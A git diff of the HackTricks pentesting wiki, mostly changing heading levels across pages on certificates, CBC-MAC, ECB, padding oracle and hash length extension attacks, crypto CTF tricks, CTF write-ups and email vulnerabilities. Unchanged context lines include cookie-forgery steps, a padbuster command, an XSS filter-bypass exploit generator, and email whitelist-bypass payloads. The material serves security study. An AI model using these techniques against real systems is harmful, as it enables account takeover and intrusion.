-## Course: **Machine Learning with scikit-learn Starter Pass**
+# Course: **Machine Learning with scikit-learn Starter Pass**
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**.
It's definitely recommended for people that haven't use scikit-learn (but know python)
-## **Course: Classification Algorithms**
+# **Course: Classification Algorithms**
The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
It also shows how to **create models** with with **scikit-learn.**
-## Course: **Decision Trees**
+# Course: **Decision Trees**
The [**Decision Trees course**](https://my.ine.com/DataScience/courses/83fcfd52/decision-trees) was very useful to improve my knowledge about **Decision and Regressions Trees**, **when** are they **useful**, **how** they **work** and how to properly **tune them**.
@@ -93,7 +91,7 @@ It also explains **how to create tree models** with scikit-learn different techn
The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**.
-##
+#
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index a283372b..0112baf9 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Certificates
-
-## What is a Certificate
+# What is a Certificate
In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject.
@@ -27,7 +25,7 @@ In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-ke
The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280.
-## x509 Common Fields
+# x509 Common Fields
* **Version Number:** Version of x509 format.
* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information.
@@ -70,13 +68,13 @@ The most common format for public key certificates is defined by [X.509](https:/
* **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate.
* **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate
-### Difference between OSCP and CRL Distribution Points
+## Difference between OSCP and CRL Distribution Points
**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\
**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\
From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm#:\~:text=OCSP%20\(RFC%202560\)%20is%20a,to%20download%20the%20entire%20CRL.\&text=A%20CRL%20provides%20a%20list,or%20are%20no%20longer%20valid.).
-### What is Certificate Transparency
+## What is Certificate Transparency
Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals:
@@ -84,19 +82,19 @@ Certificate Transparency aims to remedy certificate-based threats by **making th
* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously** issued.
* **Protect users** (as much as possible) from being duped by certificates that were mistakenly or maliciously issued.
-#### **Certificate Logs**
+### **Certificate Logs**
Certificate logs are simple network services that maintain **cryptographically assured, publicly auditable, append-only records of certificates**. **Anyone can submit certificates to a log**, although certificate authorities will likely be the foremost submitters. Likewise, anyone can query a log for a cryptographic proof, which can be used to verify that the log is behaving properly or verify that a particular certificate has been logged. The number of log servers doesn’t have to be large (say, much less than a thousand worldwide), and each could be operated independently by a CA, an ISP, or any other interested party.
-#### Query
+### Query
You can query the logs of Certificate Transparency of any domain in [https://crt.sh/](https://crt.sh).
-## Formats
+# Formats
There are different formats that can be used to store a certificate.
-#### **PEM Format**
+### **PEM Format**
* It is the most common format used for certificates
* Most servers (Ex: Apache) expects the certificates and private key to be in a separate files\
@@ -104,7 +102,7 @@ There are different formats that can be used to store a certificate.
\- Extensions used for PEM certificates are .cer, .crt, .pem, .key files\
\- Apache and similar server uses PEM format certificates
-#### **DER Format**
+### **DER Format**
* The DER format is the binary form of the certificate
* All types of certificates & private keys can be encoded in DER format
@@ -112,19 +110,19 @@ There are different formats that can be used to store a certificate.
* DER formatted certificates most often use the ‘.cer’ and '.der' extensions
* DER is typically used in Java Platforms
-#### **P7B/PKCS#7 Format**
+### **P7B/PKCS#7 Format**
* The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c
* A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key
* The most common platforms that support P7B files are Microsoft Windows and Java Tomcat
-#### **PFX/P12/PKCS#12 Format**
+### **PFX/P12/PKCS#12 Format**
* The PKCS#12 or PFX/P12 format is a binary format for storing the server certificate, intermediate certificates, and the private key in one encryptable file
* These files usually have extensions such as .pfx and .p12
* They are typically used on Windows machines to import and export certificates and private keys
-### Formats conversions
+## Formats conversions
**Convert x509 to PEM**
@@ -132,7 +130,7 @@ There are different formats that can be used to store a certificate.
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
-#### **Convert PEM to DER**
+### **Convert PEM to DER**
```
openssl x509 -outform der -in certificatename.pem -out certificatename.der
diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md
index 74c71be1..860a5ebd 100644
--- a/cryptography/cipher-block-chaining-cbc-mac-priv.md
+++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Cipher Block Chaining CBC-MAC
-
-## CBC
+# CBC
If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie.
-## CBC-MAC
+# CBC-MAC
In cryptography, a **cipher block chaining message authentication code** (**CBC-MAC**) is a technique for constructing a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode to create a **chain of blocks such that each block depends on the proper encryption of the previous block**. This interdependence ensures that a **change** to **any** of the plaintext **bits** will cause the **final encrypted block** to **change** in a way that cannot be predicted or counteracted without knowing the key to the block cipher.
@@ -31,7 +29,7 @@ To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero init
.svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
-## Vulnerability
+# Vulnerability
With CBC-MAC usually the **IV used is 0**.\
This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So:
@@ -55,19 +53,19 @@ You can create a username called **Administ** (m1) and retrieve the signature (s
Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\
now, you can use s32 as the signature of the full name **Administrator**.
-#### Summary
+### Summary
1. Get the signature of username **Administ** (m1) which is s1
2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.**
3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**.
-## Attack Controlling IV
+# Attack Controlling IV
If you can control the used IV the attack could be very easy.\
If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\
Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**.
-## References
+# References
More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md
index be0f19fe..84b58e31 100644
--- a/cryptography/crypto-ctfs-tricks.md
+++ b/cryptography/crypto-ctfs-tricks.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Crypto CTFs Tricks
-
-## Online Hashes DBs
+# Online Hashes DBs
* _**Google it**_
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
@@ -33,33 +31,33 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
-## Magic Autosolvers
+# Magic Autosolvers
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
-## Encoders
+# Encoders
Most of encoded data can be decoded with these 2 ressources:
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
-### Substitution Autosolvers
+## Substitution Autosolvers
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
* [https://quipqiup.com/](https://quipqiup.com) - Very good !
-#### Caesar - ROTx Autosolvers
+### Caesar - ROTx Autosolvers
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
-#### Atbash Cipher
+### Atbash Cipher
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
-### Base Encodings Autosolver
+## Base Encodings Autosolver
Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
@@ -132,7 +130,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
[http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
-### HackerizeXS \[_╫Λ↻├☰┏_]
+## HackerizeXS \[_╫Λ↻├☰┏_]
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
@@ -140,7 +138,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
* [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
-### Morse
+## Morse
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
@@ -148,7 +146,7 @@ Check all these bases with: [https://github.com/dhondta/python-codext](https://g
* [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
-### UUencoder
+## UUencoder
```
begin 644 webutils_pl
@@ -161,7 +159,7 @@ end
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
-### XXEncoder
+## XXEncoder
```
begin 644 webutils_pl
@@ -172,7 +170,7 @@ end
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
-### YEncoder
+## YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
@@ -182,7 +180,7 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
-### BinHex
+## BinHex
```
(This file must be converted with BinHex 4.0)
@@ -192,7 +190,7 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
-### ASCII85
+## ASCII85
```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
@@ -200,7 +198,7 @@ ryvkryvkryvkryvkryvkryvkryvk
* [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
-### Dvorak keyboard
+## Dvorak keyboard
```
drnajapajrna
@@ -208,7 +206,7 @@ drnajapajrna
* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard)
-### A1Z26
+## A1Z26
Letters to their numerical value
@@ -216,7 +214,7 @@ Letters to their numerical value
8 15 12 1 3 1 18 1 3 15 12 1
```
-### Affine Cipher Encode
+## Affine Cipher Encode
Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter
@@ -224,7 +222,7 @@ Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and t
krodfdudfrod
```
-### SMS Code
+## SMS Code
**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\
For example: 2=A, 22=B, 222=C, 3=D...\
@@ -232,7 +230,7 @@ You can identify this code because you will see** several numbers repeated**.
You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
-### Bacon Code
+## Bacon Code
Substitude each letter for 4 As or Bs (or 1s and 0s)
@@ -241,21 +239,21 @@ Substitude each letter for 4 As or Bs (or 1s and 0s)
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
```
-### Runes
+## Runes
-## Compression
+# Compression
**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers.
-## Easy Crypto
+# Easy Crypto
-### XOR - Autosolver
+## XOR - Autosolver
* [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
-### Bifid
+## Bifid
A keywork is needed
@@ -263,7 +261,7 @@ A keywork is needed
fgaargaamnlunesuneoa
```
-### Vigenere
+## Vigenere
A keywork is needed
@@ -275,9 +273,9 @@ wodsyoidrods
* [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
* [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
-## Strong Crypto
+# Strong Crypto
-### Fernet
+## Fernet
2 base64 strings (token and key)
@@ -291,7 +289,7 @@ Key:
* [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
-### Samir Secret Sharing
+## Samir Secret Sharing
A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
@@ -303,12 +301,12 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
-### OpenSSL brute-force
+## OpenSSL brute-force
* [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
* [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
-## Tools
+# Tools
* [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
* [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md
index bca97c37..08c16c08 100644
--- a/cryptography/electronic-code-book-ecb.md
+++ b/cryptography/electronic-code-book-ecb.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Electronic Code Book (ECB)
-
-## ECB
+# ECB
(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key.
@@ -30,7 +28,7 @@ Using ECB has multiple security implications:
* **Blocks from encrypted message can be removed**
* **Blocks from encrypted message can be moved around**
-## Detection of the vulnerability
+# Detection of the vulnerability
Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\
Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\
@@ -56,9 +54,9 @@ Now, the attacker just need to discover if the format is `<
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
-## Exploitation of the vulnerability
+# Exploitation of the vulnerability
-### Removing entire blocks
+## Removing entire blocks
Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it:
@@ -73,7 +71,7 @@ Then, you can remove the first block of 8B and you will et a valid cookie for th
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
-### Moving blocks
+## Moving blocks
In many databases it is the same to search for `WHERE username='admin';` or for `WHERE username='admin ';` _(Note the extra spaces)_
@@ -86,7 +84,7 @@ The cookie of this user is going to be composed by 3 blocks: the first 2 is the
** Then, just replace the first block with the last time and will be impersonating the user `admin`: `admin |username`**
-## References
+# References
* [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\))
diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md
index 88e3a45f..9454214a 100644
--- a/cryptography/hash-length-extension-attack.md
+++ b/cryptography/hash-length-extension-attack.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Hash Length Extension Attack
-
-## Summary of the attack
+# Summary of the attack
Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
@@ -32,7 +30,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
-### How?
+## How?
Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
@@ -44,11 +42,11 @@ If an attacker wants to append the string "append" he can:
* Append the string "append"
* Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
-### **Tool**
+## **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %}
-## References
+# References
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md
index 2f127fe8..c887e312 100644
--- a/cryptography/padding-oracle-priv.md
+++ b/cryptography/padding-oracle-priv.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Padding Oracle
-
-## CBC - Cipher Block Chaining
+# CBC - Cipher Block Chaining
In CBC mode the **previous encrypted block is used as IV** to XOR with the next block:
@@ -31,7 +29,7 @@ To decrypt CBC the **opposite** **operations** are done:
Notice how it's needed to use an **encryption** **key** and an **IV**.
-## Message Padding
+# Message Padding
As the encryption is performed in **fixed** **size** **blocks**, **padding** is usually needed in the **last** **block** to complete its length.\
Usually **PKCS7** is used, which generates a padding **repeating** the **number** of **bytes** **needed** to **complete** the block. For example, if the last block is missing 3 bytes, the padding will be `\x03\x03\x03`.
@@ -47,13 +45,13 @@ Let's look at more examples with a **2 blocks of length 8bytes**:
Note how in the last example the **last block was full so another one was generated only with padding**.
-## Padding Oracle
+# Padding Oracle
When an application decrypts encrypted data, it will first decrypt the data; then it will remove the padding. During the cleanup of the padding, if an **invalid padding triggers a detectable behaviour**, you have a **padding oracle vulnerability**. The detectable behaviour can be an **error**, a **lack of results**, or a **slower response**.
If you detect this behaviour, you can **decrypt the encrypted data** and even **encrypt any cleartext**.
-### How to exploit
+## How to exploit
You could use [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) to exploit this kind of vulnerability or just do
@@ -81,7 +79,7 @@ If the site is vulnerable `padbuster`will automatically try to find when the pad
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
```
-### The theory
+## The theory
In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
@@ -110,7 +108,7 @@ Then, do the same steps to decrypt C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
**Follow this chain until you decrypt the whole encrypted text.**
-### Detection of the vulnerability
+## Detection of the vulnerability
Register and account and log in with this account .\
If you **log in many times** and always get the **same cookie**, there is probably **something** **wrong** in the application. The **cookie sent back should be unique** each time you log in. If the cookie is **always** the **same**, it will probably always be valid and there **won't be anyway to invalidate i**t.
@@ -118,7 +116,7 @@ If you **log in many times** and always get the **same cookie**, there is probab
Now, if you try to **modify** the **cookie**, you can see that you get an **error** from the application.\
But if you BF the padding (using padbuster for example) you manage to get another cookie valid for a different user. This scenario is highly probably vulnerable to padbuster.
-## References
+# References
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md
index 3a860f1b..860b7d25 100644
--- a/cryptography/rc4-encrypt-and-decrypt.md
+++ b/cryptography/rc4-encrypt-and-decrypt.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# RC4 - Encrypt\&Decrypt
-
If you can somehow encrypt a plaintext using a RC4**,** you can decrypt any content encrypted by that RC4(using the same password) just using the encryption function.
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
diff --git a/ctf-write-ups/README.md b/ctf-write-ups/README.md
index c0210867..12de86b1 100644
--- a/ctf-write-ups/README.md
+++ b/ctf-write-ups/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# CTF Write-ups
-
* [Write-up factory](https://writeup.raw.pm/) - Seach engine to find write-ups \(TryHackMe, HackTheBox, etc.\)
* [CTFtime Write-ups](https://ctftime.org/writeups) - Newest write-ups added to CTF events on CTFtime
diff --git a/ctf-write-ups/challenge-0521.intigriti.io.md b/ctf-write-ups/challenge-0521.intigriti.io.md
index f17375de..20413b28 100644
--- a/ctf-write-ups/challenge-0521.intigriti.io.md
+++ b/ctf-write-ups/challenge-0521.intigriti.io.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# challenge-0521.intigriti.io
-
-### Brief Description
+## Brief Description
The challenge provides a vulnerable to XSS form in the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php).\
This form is loaded in [https://challenge-0521.intigriti.io/](https://challenge-0521.intigriti.io) via an iframe.
@@ -28,7 +26,7 @@ It was found that the form will **insert the user input inside the JavaScript `e
However, before inserting the user input inside the`eval` function, it’s checked with the regexp `/[a-df-z<>()!\\='"]/gi` so if any of those character is found, the user input won’t be executed inside `eval`.\
Anyway, it was found a way to bypass the regexp protection and execute `alert(document.domain)` abusing the dangerous `eval` function.
-### Accessing the HTML
+## Accessing the HTML
It was found that the letter `e` is permitted as user input. It was also found that there is an HTLM element using the `id="e"`. Therefore, this HtML element is accesible from Javascript just using the variable `e`:\
@@ -53,7 +51,7 @@ Then, from the `e` HTML element it’s possible to access the `document` object
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]
```
-### Calling a function without parenthesis with JS code as string
+## Calling a function without parenthesis with JS code as string
From the object `document` it’s possible to call the `write` function to **write arbitrary HTML text that the browser will execute**.\
However, as the `()` characters are **forbidden**, it’s not possible to call the function using them. Anyway, it’s possible to call a function using **backtips** (\`\`).\
@@ -71,7 +69,7 @@ e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]
You can test this code in a javascript console inside the page [https://challenge-0521.intigriti.io/captcha.php](https://challenge-0521.intigriti.io/captcha.php)
-### Final forbidden characters bypass
+## Final forbidden characters bypass
However, there is still one problem left. Most of the characters of the exploit are **forbidden** as they appear in the regexp `/[a-df-z<>()!\\='"]/gi`. But note how all the **forbidden characters are strings** inside the exploit and the **not string characters in the exploit (e\[]\`${}) are allowed**.\
This means that if it’s possible to **generate the forbidden charaters as strings from the allowed characters**, it’s possible to generate the exploit.\
@@ -85,7 +83,7 @@ Using these tricks and some more complex ones it was possible to **generate all
e["parentNode"]["parentNode"]["parentNode"]["parentNode"]["parentNode"]["write"]`${""}`
```
-### Exploit Code
+## Exploit Code
This is the python exploit used to generate the final exploit. If you execute it, it will print the exploit:
@@ -158,7 +156,7 @@ txt = f'{document}[{write}]'+'`${['+payload+']}`'
print(txt) #Write the exploit to stdout
```
-### Exploitation
+## Exploitation
In order to generate the exploit just execute the previous python code. If you prefer, you can also copy/paste it from here:
diff --git a/ctf-write-ups/try-hack-me/README.md b/ctf-write-ups/try-hack-me/README.md
index 05b46f6c..eb7ae3e4 100644
--- a/ctf-write-ups/try-hack-me/README.md
+++ b/ctf-write-ups/try-hack-me/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Try Hack Me
-
diff --git a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
index 3266895f..ce1c5ba1 100644
--- a/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
+++ b/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# hc0n Christmas CTF - 2019
-
-## Enumeration
+# Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md
index 5ca96658..b6777cba 100644
--- a/ctf-write-ups/try-hack-me/pickle-rick.md
+++ b/ctf-write-ups/try-hack-me/pickle-rick.md
@@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Pickle Rick
This machine was categorised as easy and it was pretty easy.
-### Enumeration
+# Enumeration
I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion):
@@ -50,7 +49,7 @@ Checking the source code of the root page, a username is discovered: `R1ckRul3s`
Therefore, you can login on the login page using the credentials `R1ckRul3s:Wubbalubbadubdub`
-### User
+# User
Using those credentials you will access a portal where you can execute commands:
@@ -72,7 +71,7 @@ The **second ingredient** can be found in `/home/rick`
.png>)
-### Root
+# Root
The user **www-data can execute anything as sudo**:
diff --git a/emails-vulns.md b/emails-vulns.md
index 9ebb62ce..4fe6d0db 100644
--- a/emails-vulns.md
+++ b/emails-vulns.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Emails Vulnerabilities
+# Payloads
-## Payloads
-
-### Ignored parts of an email
+## Ignored parts of an email
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
@@ -31,43 +29,43 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i
* E.g. john.doe(intigriti)@example.com → john.doe@example.com
-### Whitelist bypass
+## Whitelist bypass
* inti(;inti@inti.io;)@whitelisted.com
* inti@inti.io(@whitelisted.com)
* inti+(@whitelisted.com;)@inti.io
-### IPs
+## IPs
You can also use IPs as domain named between square brackets:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
-### Other vulns
+## Other vulns
.png>)
-## Third party SSO
+# Third party SSO
-### XSS
+## XSS
Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**.
-### Account-Takeover
+## Account-Takeover
If a **SSO service** allows you to **create an account without verifying the given email address** (like **salesforce**) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account.\
_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._
-## Reply-To
+# Reply-To
You can send an email using _**From: company.com**_** ** and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**.
-## **References**
+# **References**
* [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)
-## Hard Bounce Rate
+# Hard Bounce Rate
Some applications like AWS have a **Hard Bounce Rate** (in AWS is 10%), that whenever is overloaded the email service is blocked.
diff --git a/exfiltration.md b/exfiltration.md
